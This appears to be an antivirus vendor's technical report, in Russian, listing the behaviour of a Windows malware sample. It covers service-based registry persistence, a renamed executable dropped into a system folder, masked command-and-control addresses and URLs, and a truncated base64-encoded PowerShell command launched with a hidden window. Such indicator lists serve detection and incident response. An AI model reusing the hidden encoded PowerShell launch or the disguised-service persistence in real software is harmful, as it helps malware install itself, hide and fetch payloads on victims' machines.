Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData0049] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData0049] 'ImagePath' = '"%WINDIR%\SysWOW64\auditpolmsg\NlsData0049.exe"'
- 'NlsData0049' "%WINDIR%\SysWOW64\auditpolmsg\NlsData0049.exe"
- 'NlsData0049' %WINDIR%\SysWOW64\auditpolmsg\NlsData0049.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAEIATQBYAEkAagBtAGIAPQAnAEgAQwBGAEIAWQBrAGsAdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBJAHQAeQBgAHAAYABSAG8AVABvAEMATwBMACIAIAA9AC...
- %HOMEPATH%\45.exe
- %WINDIR%\syswow64\auditpolmsg\nlsdata0049.exe
- %HOMEPATH%\45.exe в %WINDIR%\syswow64\auditpolmsg\nlsdata0049.exe
- '17#.#0.229.168':443
- '18#.#4.252.13':443
- http://ar####aonsale.com/cgi-bin/VuM64/
- http://18#.##.252.13:443/pcJd5vPYWjfi9wo5x5w/6TyQ4/ via 18#.#4.252.13
- DNS ASK ar####aonsale.com
- '%HOMEPATH%\45.exe'
- '%WINDIR%\syswow64\auditpolmsg\nlsdata0049.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAEIATQBYAEkAagBtAGIAPQAnAEgAQwBGAEIAWQBrAGsAdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYABjAFUAUgBJAHQAeQBgAHAAYABSAG8AVABvAEMATwBMACIAIAA9AC...' (со скрытым окном)